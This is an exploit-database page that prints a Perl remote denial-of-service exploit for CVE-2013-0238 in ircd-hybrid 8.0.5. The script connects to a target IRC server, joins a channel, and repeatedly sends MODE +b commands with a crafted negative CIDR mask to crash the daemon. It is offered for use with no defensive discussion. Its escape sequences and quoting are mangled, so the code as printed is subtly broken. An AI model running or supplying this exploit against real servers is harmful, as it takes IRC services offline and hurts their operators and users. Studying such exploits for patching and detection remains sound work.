[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ircd-hybrid 8.0.5 - Denial of Service
# Published : 2013-04-12
# Author :
# Previous Title : MinaliC Webserver 2.0.0 - Buffer Overflow
# Next Title : AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS


#!/usr/bin/perl
# ircd-hybrid remote denial of service exploit for CVE-2013-0238
# quick and dirty h4x by kingcope
# tested against ircd-hybrid-8.0.5 centos6
# please modify below in case of buggy code.
# enjoy!

use Socket;

srand(time());
$exploiting_nick = "hybExpl" . int(rand(10000));
    
sub connecttoserver()
{
 $bool = "yes";
 $iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver");
 $paddr = sockaddr_in($ircport, $iaddr);
 $proto = getprotobyname('tcp');
 socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!");
 connect(SOCK1, $paddr) || {$bool = "no"};
}

sub usage() {
 
 print "usage: ircd-hybrid.pl <target> <port>rn";
 exit;
}

$| = 1;
print "----------------------------------------------------------------------rnLets have fun!rn";
print "----------------------------------------------------------------------rn";

if (!defined($ARGV[1])) {
 usage(); 
}

$ircport = $ARGV[1];
$ircserver = $ARGV[0];

print "Connecting to $ircserver on port $ircport...n";

connecttoserver();

if ($bool eq "no")
{
 print "Connection refused.rn";
 exit(0);
}

send(SOCK1,"NICK $exploiting_nickrn",0);
send(SOCK1,"USER $exploiting_nick "yahoo.com" "eu.hax.net" :$exploiting_nickrn",0);

while (<SOCK1>) { 
 $line = $_;
 print $line;
 if ((index $line, " 005 ") ne -1) {
  goto logged_in; 
 }
 
 if ((index $line, "PING") ne -1) {
  substr($line,1,1,"O");
  send(SOCK1, $line, 0); 
 }
}

logged_in:

print " okrn"; 

print "Sending buffers...rn";
$channelr = int(rand(10000));
send(SOCK1, "JOIN #h4xchan$channelrrn", 0);
sleep(1);
$k = 0;
do {
print $_;
$k++;
$crashnum = -1000009 - $k * 1000;
send(SOCK1, "MODE #h4xchan$channelr +b *!*@127.0.0.1/$crashnumrn", 0);
} while(<SOCK1>);
 
print "donern";

# EOF